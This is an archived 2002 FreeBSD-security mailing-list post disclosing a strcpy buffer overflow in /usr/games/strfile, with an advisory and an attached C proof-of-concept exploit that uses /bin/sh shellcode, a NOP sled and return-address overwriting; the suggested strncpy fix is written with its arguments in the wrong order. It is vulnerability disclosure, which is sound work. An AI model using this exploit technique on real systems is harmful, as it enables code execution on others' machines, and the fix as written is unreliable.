Date: Sun, 05 May 2002 22:33:14 +0100 From: ReDeeMeR <g0tr00t@usa.net> To: <FreeBSD-security@FreeBSD.org> Subject: Buffer overflow in /usr/games/strfile Message-ID: <20020505213314.8762.qmail@uwdvg007.cms.usa.net>
index | next in thread | raw e-mail
[-- Attachment #1 --] Hi, Below is an advisory for a vulnerable buffer in the /usr/games/strfile binary which can be overflowed. I emailed this information to security-officer@freebsd.org on 28/04/02 and am yet to receive a reply. The reason I am posting this so early is that it is not really a major security risk (the binary file in question is not suid), but it is a practice of bad coding so I felt it my duty to make you aware of it. Also find attached my proof of concept code. Thanks, -ReDeeMeR- --begin paste-- -=[ g0tr00t.net advisory ]=- FreeBSD /usr/games/strfile buffer overflow ReDeeMeR (redeemer@g0tr00t.net) http://www.g0tr00t.net http://bse.die.ms/~redeemer/releases/ReDeeMeR/advisories/strfilexp.txt -=[ Date discovered ]=- 24/04/02 -=[ Discovered by ]=- ReDeeMeR (redeemer@g0tr00t.net) -=[ Outline ]=- FreeBSD /usr/games/strfile contains a vulnerable buffer which can be overflowed. The games package is NOT installed by default. The strfile binary is NOT suid (4755), thus, the security risk here is not great. -=[ Impact ]=- No extra privileges can be gained. -=[ Affected ]=- Successfully tested on FreeBSD4.5-RELEASE, suspected vulnerability on ALL FreeBSD machines which ship this software. -=[ Vendor Status ]=- FreeBSD (http://www.freebsd.org) contacted on 28/04/02 No reply after 7 days, so released this advisory due to the fact that this is not a major security issue. Advisory released on 05/05/02 -=[ Description ]=- /usr/games/strfile ("strfile" hereafter) is vulnerable to a standard buffer overflow. The problem exists due to insufficient checking procedures on command line input. The vulnerability exists in a poorly utilised strcpy() function (found on line 310 of strfile.c) which reads from an unchecked buffer: (void) strcpy(Outfile, *argv); Thus, a large input (greater than allocated buffer space) will cause strfile to segfault. This in turn can lead to the execution of arbitrary commands. A user can cause strfile to crash by inputting a string of length equal to or greater than 1069 bytes, and an input of equal to or greater than 1088 bytes in length will cause the eip of strcpy() to be overwritten with our input. This can be further investigated with the use of gdb, although I am not going to paste gdb output in this advisory. To reproduce this bug, execute the following command: FreeBSD$ /usr/games/strfile `perl -e 'print "A" x 1069'` -=[ Proof of concept ]=- Proof of concept code can be located at: http://bse.die.ms/~redeemer/releases/ReDeeMeR/exploits/strfilexp.c If the program is successfully exploited, the terminal output should look something like this: bash-2.05a$ uname -a FreeBSD 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Sat Apr 20 14:14:37 BST 2002 redeemer@:/usr/src/sys/compile/TOX i386 bash-2.05a$ id uid=31337(redeemer) gid=31337(redeemer) groups=31337(redeemer), 0(wheel) bash-2.05a$ ./strfilexp ReDeeMeR's proof of concept code for /usr/games/strfile Using return addr: 0xbfbffb0c Buffer size: 2000 $ id uid=31337(redeemer) gid=31337(redeemer) groups=31337(redeemer), 0(wheel) $ *Notice that no extra privileges have been gained (due to strfile NOT being suid)* -=[ Fix ]=- A suggested fix was sent by me to FreeBSD to use strncpy() instead of strcpy(). Replace (void) strcpy(Outfile, *argv); with: (void) strncpy(Outfile, sizeof(Outfile), *argv); FreeBSD are yet to respond to my e-mail, but I will assume that they received it and have implemented an update in strfile.c within the FreeBSD-current branch. -=[ Greets ]=- Thanks to: The Itch - For various mentoring and for hosting g0tr00t.net. keoki - Someone to collaborate/compete with. Chawmp - " " " " " Greets: #g0tr00t, #ch0wn, #Turbo-IRC, #NeXT. --end paste-- [-- Attachment #2 --] /* Proof of concept code for /usr/games/strfile [28/04/02] * Does not gain root shell, merely a proof of concept code * Tested on FreeBSD4.5-RELEASE * Find the advisory at * http://bse.die.ms/~redeemer/releases/ReDeeMeR/advisories/strfilexp.txt * * redeemer@g0tr00t.net * http://www.g0tr00t.net * http://bse.die.ms/~redeemer/legal.shtml applies to this file. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define MOO 2000 /* RET size */ #define LEN 2048 /* EGG zie */ #define NOP 0x90 /* FreeBSD execve shellcode */ char shellcode[]= "\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b" "\x08\x89\x43\x0c\x50\x8d\x53\x08\x52\x53" "\xb0\x3b\x50\xcd\x80\xe8\xe4\xff\xff\xff" "/bin/sh"; int main(void) { char *buff, *egg, *ptr; long *addr_pointer, addr; int bsize = MOO, eggsize = LEN, get_sp = (int)&get_sp, i; buff = malloc(bsize); egg = malloc(eggsize); printf("ReDeeMeR's proof of concept code for /usr/games/strfile\n"); printf("Using return addr: \t0x%x\n", get_sp); printf("Buffer size: \t\t%d\n", bsize); ptr = buff; addr_pointer = (long *)ptr; for (i = 0; i < bsize; i += 4 ) { *(addr_pointer++) = get_sp; } ptr = egg; for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) { *(ptr++) = NOP; } for (i = 0; i < strlen(shellcode); i++) { *(ptr++) = shellcode[i]; } buff[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg, "EGG=", 4); putenv(egg); execl("/usr/games/strfile", "strfile", buff, NULL); return(0); } /* EOF */home | help
Want to link to this message? Use this
URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20020505213314.8762.qmail>